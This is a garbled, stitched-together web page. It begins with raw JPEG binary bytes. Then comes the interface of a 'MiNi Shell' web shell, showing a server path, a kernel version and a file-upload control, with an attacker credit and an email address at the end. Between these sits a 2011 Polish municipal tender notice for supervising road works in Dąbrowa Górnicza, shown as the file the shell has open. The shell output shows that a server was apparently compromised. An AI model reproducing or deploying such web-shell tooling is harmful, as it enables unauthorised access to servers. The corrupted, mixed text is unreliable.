JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110307/75147-N-2011.html

<p class="kh_header"><b>Dąbrowa Górnicza: Sprawowanie nadzoru budowlanego nad robotami drogowymi w zakresie wykonywania funkcji inspektora nadzoru inwestorskiego w branży drogowej nad realizacją umów i robót realizowanych przez Wydział Komunikacji i Drogownictwa Urzędu Miejskiego w Dąbrowie Górniczej.</b><br>
<b>Numer ogłoszenia: 75147 - 2011; data zamieszczenia: 07.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2956700, faks 032 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprawowanie nadzoru budowlanego nad robotami drogowymi w zakresie wykonywania funkcji inspektora nadzoru inwestorskiego w branży drogowej nad realizacją umów i robót realizowanych przez Wydział Komunikacji i Drogownictwa Urzędu Miejskiego w Dąbrowie Górniczej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie o udzielenie zamówienia prowadzone w trybie przetargu nieograniczonego  o wartości zamówienia poniżej  193 000  EUR  zgodnie  z  postanowieniami Ustawy z dnia 29  stycznia 2004 r. - Prawo zamówień publicznych (Dz.U. Z 2010 r. Nr 113, poz. 759 z późn. zm.).
1.Uprawnienia, zakres i obowiązki przy sprawowaniu nadzoru budowlanego dotyczącego pełnienia funkcji inspektora nadzoru budowlanego regulują obowiązujące przepisy prawne, a w szczególności Ustawa z dnia 07.07.1994r. - Prawo budowlane (tekst jednolity Dz.U. z 2010r. Nr 243, poz. 1623 z późn. zm.).
2. Zakres rzeczowy obejmuje :
2.1 Sprawowanie nadzoru budowlanego nad realizacją zadań drogowych będących w kompetencjach Wydziału Komunikacji i Drogownictwa, wykonywanych w ramach umów z poszczególnymi wykonawcami, w szczególności:
2.1.1 Sprawowanie nadzoru budowlanego nad robotami związanymi z bieżącym utrzymaniem dróg i infrastruktury pasa drogowego w Gminie Dąbrowa Górnicza, w których zakres w szczególności wchodzi:
a)	usuwanie pojedynczych i grupowych ubytków w nawierzchniach jezdni, chodników, parkingów, placów, zatok itp. elementów pasa drogowego,
b)	przebudowa, naprawa otwartych i przewodowych urządzeń odwadniających na odcinkach dróg, o ile wymagać będzie tego zakres bieżącego utrzymania,
c)	usuwanie skutków działania żywiołów, nadzwyczajnych zagrożeń środowiska itp. w pasie drogowym
d)	prace konserwacyjne obiektów inżynierskich (mosty, wiadukty, przepusty)
e)	odtwarzanie poboczy dróg,
f)	przebudowa nawierzchni dróg w granicach wydzielonego pasa drogowego
g)	przebudowa chodników i uzupełnianie brakujących odcinków ciągów pieszych, zatok parkingowych, miejsc postojowych dla samochodów itp. 
h)	frezowanie i układanie nawierzchni asfaltowej na odcinkach jezdni wskazanych przez Zamawiającego, o ile wymagać będzie tego stan techniczny nawierzchni,
i)	utwardzanie dróg dojazdowych,
j)	wymiana istniejących krawężników, obrzeży lub układanie nowych ,
k)	roboty nieprzewidziane i zamienne, których wykonanie będzie konieczne dla prawidłowej realizacji przedmiotu zamówienia określonego w pkt a) - j) jak na przykład:
-	likwidacje lub przekładki niezinwentaryzowanego uzbrojenia podziemnego,
-	przekładki, odbudowa lub wymiana armatury uzbrojenia, fragmentów ogrodzeń, szaf zasilających, studni teletechnicznych, 
-	karczowanie lub frezowanie pni.
Uwaga: Aktualnie zadanie wykonywane jest na podstawie dwóch umów:
1. Bieżące utrzymanie sieci dróg wraz z obiektami inżynierskimi na terenie Gminy Dąbrowa Górnicza, rozumianych jako pas drogowy w stanie zdolnym do bezpiecznego użytkowania w dzielnicach: Centrum, Gołonóg, Stara Dąbrowa, Marianki, Ratanice, Korzeniec. 
- nr ZP/203/WKD/08,
- wartość: 18.000.000,00 PLN,
- czas realizacji: 09.02.2009r. - 08.02.2012r. 
     2. Bieżące utrzymanie sieci dróg wraz z obiektami inżynierskimi, których zarządcą jest Prezydent Miasta w Dąbrowie Górniczej w dzielnicach: Łosień, Łęka, Okradzionów, Błędów, Ząbkowice, Ujejsce, Strzemieszyce, Trzebiesławice, Tucznawa
- nr ZP/62/WKD/08,
- wartość: 15.000.000, 00 PLN,
- czas realizacji 14.08.2008r. - 13.08.2011r.
2.1.2 Sprawowanie nadzoru budowlanego nad robotami związanymi z renowacją rowów odwadniających oraz zbieraniem nadmiarów ziemi z poboczy dróg, w której zakres w szczególności wchodzi: 
a) czyszczenie rowów z wyprofilowaniem skarp i dna rowu
b) czyszczenie poboczy rowów
c) umacnianie skarp płytami ażurowymi
d) umacnianie dna rowów korytkami betonowymi
e) umacnianie skarp i dna rowów płytkami
f)czyszczenie przepustów  z namułu
g) wykonywanie przepustów rurowych wraz ze ściankami czołowymi pod zjazdami
h) humusowanie i obsiewanie skarp mieszanką traw
i)ścinanie poboczy wraz z ręcznym plantowaniem
j)wykonywanie przykanalików i studzienek ściekowych.
Uwaga: Aktualnie zadanie wykonywane jest na podstawie umowy:
Renowacja rowów odwadniających oraz zbieranie nadmiarów ziemi z poboczy   
 dróg na terenie gminy Dąbrowa Górnicza. 
- nr ZP/127/WKD/08, 
- wartość: 5.000.000,00 PLN,
- czas realizacji 23.10.2008r. - 23.10.2011r.
2.1.3. Sprawowanie nadzoru budowlanego nad robotami budowlanymi realizowanymi w związku z zadaniem pn.: Prowadzenie działań w zakresie zarządu dróg, zgodnie z ustawą z dnia 21 marca 1985r. o drogach publicznych (tekst jednolity Dz.U. z 2007r. nr 19 poz. 115 z późniejszymi zmianami), których zarządcą jest Prezydent Miasta Dąbrowa Górnicza oraz realizacja zadań związanych z bezpieczeństwem w ruchu drogowym, w zakres którego w szczególności wchodzi:
- naprawa zniszczonych, uszkodzonych nawierzchni znajdujących w obrębie pasa drogowego (np. jezdni, chodników, poboczy) powodujących zagrożenia w ruchu.
Uwaga: Aktualnie zadanie realizowane jest na podstawie umowy: Prowadzenie działań w zakresie zarządu dróg, zgodnie z ustawą z dnia 21 marca 1985r. o drogach publicznych (tekst jednolity Dz.U. z 2007r. nr 19 poz. 115 z późniejszymi zmianami), których zarządcą jest Prezydent Miasta Dąbrowa Górnicza oraz realizacja zadań związanych z bezpieczeństwem w ruchu drogowym. 
- nr : ZP/39/WKD/09, 
- wartość: 17.934.000,00PLN w tym: 5.000.000 PLN na roboty budowlane związane z remontami nawierzchni znajdujących się w obrębie pasa drogowego,
- czas realizacji 29.05.2009r. - 29.05.2012r.
2.1.4. Z uwagi na konieczność zapewnienia ciągłości wykonywania w/w zadań nadzór budowlany będzie sprawowany także nad realizacją zadań drogowych wykonywanych na podstawie umów, które na analogiczny przedmiot i zakres zostaną zawarte w przyszłości i będą obowiązywać po upływie ważności aktualnych umów. 
2.2  Określanie i uzgadnianie z Wykonawcą robót i Zamawiającym technologii robót  remontowych.
2.3 Opracowanie przedmiarów robót dla planowanych robót remontowych.                    
2.4 Określanie  zakresu rzeczowego zlecanych robót remontowych.                                 
2.5 Udział w pracach komisji przetargowych dotyczących postępowań, których przedmiotem są zadania Wydziału Komunikacji i Drogownictwa.
2.6 Udział w wizjach lokalnych dotyczących wnoszonych pism do tutejszego Wydziału,
3. W ramach umowy Wykonawca zobowiązuje  się służyć doradztwem technicznym w zakresie tematów technologicznych, biorąc udział w naradach oraz udzielając pisemnych odpowiedzi na zapytania Zamawiającego.
4. Wykaz umów, których dotyczy sprawowanie nadzoru budowlanego stanowić będzie załącznik nr 1 do umowy.
4.1 Wykaz będzie aktualizowany na drodze aneksu w momencie wygaśnięcia lub zawarcia umowy na realizację zadań drogowych.
5.W  ramach realizacji usługi stanowiącej przedmiot zamówienia Wykonawca zobowiązany będzie do:
a) świadczenia czynności stanowiących przedmiot zamówienia w dni powszednie w godzinach pracy Urzędu Miejskiego, tj. 7.30-15.30. W w/w godzinach Wykonawca zobowiązany będzie do zapewnienia ciągłego nadzoru drogowego i mostowego.
b) o ile wystąpi  taka konieczność, w sytuacji awaryjnej, realizowania przedmiotu umowy również na wydłużonej zmianie, jak również w dni wolne nie wymienione w ppkt. a). W okresie realizacji umowy są  to sytuacje sporadyczne, Zamawiający zakłada, że w ciągu miesiąca w czasie realizacji niniejszej umowy mogą wystąpić około 4 razy.
c) Wykonawca winien dysponować własnym środkiem transportu i łączności, których użycie należy uwzględnić w kalkulacji ceny ofertowej.
6. Zamawiający zobowiązuje się udostępnić Wykonawcy na jego żądanie dokumenty związane z realizacją zadań będących przedmiotem niniejszej umowy.
7. Wykonawca zapewni ciągłość ubezpieczenia od odpowiedzialności cywilnej przez cały okres realizacji umowy na kwotę min 600.000zł.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego w stosunku do zamówienia podstawowego opisanego w specyfikacji na podstawie Art.67 ust.1 pkt. 6 Ustawy. Zamówienie uzupełniające będzie stanowić usługę nadzoru budowlanego nad robotami budowlanymi tego samego rodzaju.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony przez wykonawcę jeżeli ten, w siłach własnych lub  polegając na zasobach innych podmiotów w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub wykonuje minimum 1 usługę polegającą na nadzorowaniu robót drogowych w pasie drogowym przy odbywającym się ruchu pojazdów o wartości usługi nie mniejszej niż 100.000 zł brutto uzyskanej w okresie nie dłuższym niż 12 kolejno następujących po sobie miesięcy.
Ocena spełniania ww. warunku udziału w postępowaniu będzie dokonana wg formuły: spełnia - nie spełnia na podstawie wykazu wykonanych oraz wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony przez wykonawcę jeżeli ten, w siłach własnych lub polegając na zasobach innych podmiotów dysponuje min. 2 osobami posiadającymi uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno - budowlanej w zakresie dróg oraz min. 2 osobami posiadającymi uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno - budowlanej w zakresie mostów. Zamawiający dopuszcza możliwość posiadania uprawnień do obydwu zakresów przez jedną osobę. 
Ocena spełniania ww. warunku udziału w postępowaniu będzie dokonana wg formuły: spełnia - nie spełnia na podstawie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 600 tys. zł.
Ocena spełniania ww. warunku udziału w postępowaniu będzie dokonana wg formuły: spełnia - nie spełnia na podstawie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego  ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 600 tys. zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Należy przedłożyć:
1. formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w  formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
3. zobowiązanie innych podmiotów, w szczególności pisemne, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b Ustawy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach:
1. zmiany przepisów istotnych dla zawartej umowy,
2. zmiany kluczowego personelu Wykonawcy lub Zamawiającego na skutek zdarzeń losowych, zmian kadrowo - personalnych, utraty wymaganych uprawnień, utraty stanowiska, zmiana kluczowego personelu wykonawcy może nastąpić wyłącznie pod warunkiem okazania uprawnień równoważnych.
3. zmiany podwykonawcy/podwykonawców na zasobach których Wykonawca opierał się wykazując spełnienie warunków udziału w postępowaniu pod warunkiem, że nowy 
podwykonawca wykaże spełnienie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miejski w Dąbrowie Górniczej, ul. Graniczna 21, III piętro pok. Nr 317 Wydział Komunikacji i Drogownictwa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2011 godzina 09:30, miejsce: Urząd  Miejski w Dąbrowie Górniczej, ul. Graniczna 21, III piętro pok. Nr 317 Wydział Komunikacji i Drogownictwa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Zamówienie nie jest finansowane ze środków Unii Europejskiej. II. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia: 1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 8 niniejszej SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 9 SIWZ. 2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt. 9.2. SIWZ przez  każdego z  nich, natomiast dokumenty i oświadczenia  wymienione w pkt. 9.1.2, 9.1.3. i 9.1.4. SIWZ wspólnie przy czym w przypadku polisy Zamawiający dopuszcza także przedstawienie jednej polisy wystawionej na Wykonawców wspólnie ubiegających się o udzielenie  zamówienia. Oświadczenie wymienione w pkt. 9.1.1. SIWZ i Formularz ofertowy wymieniony w pkt. 9.3.1. SIWZ - winny być podpisane przez  uprawnionego przedstawiciela Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 4. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem. III. Wymagania dotyczące zabezpieczenia należytego wykonania umowy: Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5 % maksymalnej wartości nominalnej umowy brutto.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com